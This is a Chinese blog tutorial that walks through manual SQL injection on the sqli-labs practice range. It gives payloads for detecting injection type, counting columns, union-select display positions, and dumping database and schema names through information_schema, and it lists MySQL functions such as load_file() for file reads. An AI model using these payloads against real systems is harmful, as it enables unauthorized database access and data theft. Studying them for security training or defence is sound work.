SQL注入详细步骤讲解

最新推荐文章于 2024-05-22 08:39:03 发布
最新推荐文章于 2024-05-22 08:39:03 发布
阅读量1.1k 收藏 11
点赞数 1
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66460483/article/details/126066610
版权

SQL注入详细步骤讲解

 

 

1、Get型 整型与字符型注入判断:

 

举例:

 

http://xxx/xxx/Less-1/?id=1 and 1=1 --+ 

 

输入?id=1 and 1=1 --+正常,输入?id=1 and 1=2 --+报错,可判断为整型注入。

 

http://xxx.xxx/Less-1/?id=1'   

 

输入?id=1'出现报错,输入?id=1''正常,可判断为字符型注入。

 

http://xxx.xxx/Less-1/?id=1' and 1=1 -- -  

 

输入?id=1' and 1=1 -- -正常,输入?id=1' and 1=2 -- -报错,可判断为字符型注入。

 

http://xxx/xxx/Less-1/?id=1' and 1=1 --+ 

 

输入?id=1' and 1=1 --+正常,输入?id=1' and 1=2 --+报错,可判断为字符型注入。

 

 

 

总结:--+为注释后面的内容 -- -也可以用,效果一样。单引号是用来猜其是否存在字符型注入的,不加的就是测试其是否是整型注入的。

 

 

 

2、判断列数

 

判断完整型还是字符型后,去判断有多少列,当输入的列数超过它本来的就会出现报错。

 

举例:id=1' order by 4 --+ 判断这个数据库是否有四列,如果不是会报错,反之不报错。

 

 

 

3、判断显示位及在显示位上放一些sql函数来获取你想要知道的。

 

id改为0或负数或100000这种很大的数,这中不存在的情况就会使其报错,就会直接执行后面的语句。

 

 

 

举例:id=0' union select 1,2,3 --+ 判断其中的显示位为哪个,假如是3,那就可在这个位置上加入sql函数来测试。

 

 MySql的函数有:

 

1:system_user() 系统用户名

 

2:user() 用户名

 

3:current_user 当前用户名

 

4:session_user() 连接数据库的用户名

 

5:database() 数据库名

 

6:version() MYSQL数据库版本

 

7:load_file() 转成16进制或者是10进制 MYSQL读取本地文件的函数

 

8:@@datadir 读取数据库路径

 

9:@@basedir MYSQL 安装路径

 

10:@@version_compile_os 操作系统

 

 

 

举例:

 

1)http://xxx/Less-1/?id=0' union select 1,2,database() --+ 获取当前数据库名。

 

2)http://xxx/Less-1/?id=0' union select 1,2, group_concat(SCHEMA_NAME) from information_schema.SCHEMATA --+ 

 

显示所有库名。

 

group_concat() 是把相同的值全部以逗号分割的形式列出来。

m0_66460483
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入过程详解
Quest_sec的博客
11-11 870
SQL注入是什么、如何进行SQL注入、一般流程是什么、SQLMAP工具的使用...
SQL注入详解
L_longqihang的博客
04-15 556
SQL注入 原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。平台层注入由不安全的数据库配置或数据库平台的漏洞所致;代码层主要是由于程序员对输入未进行细致地过滤...
sql注入详细过程
qq_42890862的博客
06-30 5873
mysql mysql5.0以上版本包含内置的information_schema数据库,它储存着mysql所有的数据库和表结构信息,利用该数据库可以查询到所有的数据库和表的内容 5.0 暴力破解的方式获取数据 1.原理 当我们的Web app在向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 2.sql手工注入的基本思路 (1)找到注入点 在我们可控的输入部分加一些符号,查看页
sql注入一般流程(附例题)
热门推荐
Battery的博客
08-03 10万+
在与服务器数据库进行数据交互的地方拼接了恶意的sql代码,达到欺骗服务器执行恶意代码的目的。本质上是程序把用户输入的数据当成了sql语句执行。
什么是SQL注入SQL注入详解(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
weixin_45840241的博客
05-22 3935
注意,在上面这个mapper文件中,只有一个select语句,而这个语句传参使用了符号$,它会把参数值直接进行替换,而不会进行预编译(如果使用占位符#,就会进行预编译,从而可以防止SQL注入)。(2) 加 ’and 1=1 此时sql 语句为:select * from table where name=’admin’ and 1=1’ ,也无法进行注入,还需要通过注释符号将其绕过;这显然是不对的,接口把查询范围之外的数据都搜索出来了,如果还有一些修改数据或者操纵数据库的一些命令,那就更危险了。
SQL注入的详细过程
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-21 1306
SQL注入详细过程:SQL注入的详细过程第一步:SQL注入点探测。探测SQL注入点是关键的第一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。通常只要带有输入提交的动态网页,并且动态网页访问数据库,就可能存在SQL注入漏洞。如果程序员信息安全意识不强,采用动态构造SQL语句访问数据库,并且对用户输入未进行有效验证,则存在SQL注入漏洞的可能性很大。一般通过页面的报错信息来确定是否存在SQL注入漏洞。 SQL注入的详细过程第二步:收集后台数据库信息。不同数据库的注入方法、函数都不尽相同,因此在
SQL注入基础
屿的博客
02-14 4430
各位靓仔们是否经常听到sql注入呢,那么什么是sql注入?引用微软官方的语言来说:SQL 注入是一种攻击方式,在这种攻击方式中,在字符串中插入恶意代码,然后将该字符串传递到 SQL Server 的实例以进行分析和执行。构成 SQL 语句的任何过程都应进行注入漏洞审阅,因为 SQL Server 将执行其接收到的所有语法有效的查询。一个有经验的、坚定的攻击者甚至可以操作参数化数据。那么接下来,让我们来了解一下sql注入是如何产生的。
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
03-17 4102
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
SQL注入实例讲解
03-29
在这个“SQL注入实例讲解”中,我们将深入探讨这一话题,了解其工作原理,以及如何防范。 首先,让我们理解SQL注入的基本概念。在Web应用中,当用户的数据与数据库交互时,如果程序直接将用户的输入拼接到SQL查询中...
2SQL注入技术实例讲解
03-02
SQL注入是一种常见的网络安全威胁..."zhuru.htm"和"zhuru.files"可能包含详细的步骤解释、代码示例或实验环境,帮助读者更好地理解和实践SQL注入技术的防护措施。学习和掌握这些知识对于提高Web应用的安全性至关重要。
sql注入天书
11-07
当然,这只是传入参数是数字型的时候用的判断方法,实际应用的时候会有字符型和搜索型参数,我将在中级篇的“SQL注入一般步骤”再做分析。 第三节、判断数据库类型及注入方法 不同的数据库的函数、注入方法都是有...
php中sql注入漏洞示例 sql注入漏洞修复
12-18
 一、SQL注入的步骤 a) 寻找注入点(如:登录界面、留言板等) b) 用户自己构造SQL语句(如:’ or 1=1#,后面会讲解) c) 将sql语句发送给数据库管理系统(DBMS) d) DBMS接收请求,并将该请求解释成机器代码指令,...
SQL注入简介和注入方法教学
HAKUNAMATATATTA的博客
11-14 4980
sqli-labs靶场为例,详细介绍GET显错注入,GET盲注等一系列最新常见得SQL注入方法
sql注入类型步骤详解(易懂)
m0_65080524的博客
07-26 641
介绍sql的原理,危害以及防御,并且附上详细的注入步骤以及常见过滤手段
细说——SQL注入的常见方式
LainWith的博客
11-04 6870
目录BurpSuite预配置1. 安装CO22. 配置CO23. 小试牛刀使用pikachu靶场的“字符型注入”联合查询(union)函数介绍order byunion selectlimit操作报错盲注1. 获取数据库名2. 获取敏感信息3.获取 mysql 账号密码其他报错函数4. 获取表名4.1 获取第一张表4.2 获取第二张表4.3 获取所有表5. 获取列5.1 获取第一列5.2 获取第二列5.3 获取所有列6. 获取列中的数据6.1 获取第一组数据6.2 获取第二组数据6.3 获取所有数据布尔盲注
SQL注入步骤
Qianzshuo的博客
03-20 1995
1、寻找注入点 寻找url中存在?能够传递参数到后端的页面; 例如 news_detail.php?id=2 2、判断是否存在SQL漏洞 判断标准:就是前端输入恶意的SQL内容,能够带到后端数据库执行; 逻辑操作: select * from zeeker where id=2 and 1=1; 结果:可以查出数据 select * from zeeker where id=2 and 1=2; 结果:不可以查出数据 (判断闭合方式忽略) 3、判断当前查询的表有多少列 order by 列数,6报错,5不报
Sql注入流程
weixin_45837672的博客
07-20 2611
Sql注入本质是把用户输入都数据当做代码来执行,最终达到欺骗服务器执行恶意的SQL命令。
SQL注入SQL Injection)从注入到拖库 —— 简单的手工注入实战指南精讲
qq_62564422的博客
02-04 1532
意为从information_schema.tables表中筛选出所有表名(table_name)属于名为’security’的数据库模式(table_schema),然后将这些表名连接成一个字符串(group_concat())。如果页面中出现1,2,3任一字样,则为爆出了的显示位,可在后续代码中替换为信息获取函数。ⅲ. 猜想:能够回显的原因是 因为select选择的结果集(1,2,3)与当前数据表的列数相同,当id值为无效的 id 值-1时,结果集就会代替设定好需要显示的原数据显示出来。
ssm框架的增删改查过程讲解
05-22
下面我将讲解一下在SSM框架中进行增删改查的过程。 1. 增加数据: 在SSM框架中,增加数据的过程一般分为以下几个步骤: (1)在Spring配置文件中配置数据源和MyBatis的SqlSessionFactory,以及事务管理器。 (2...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值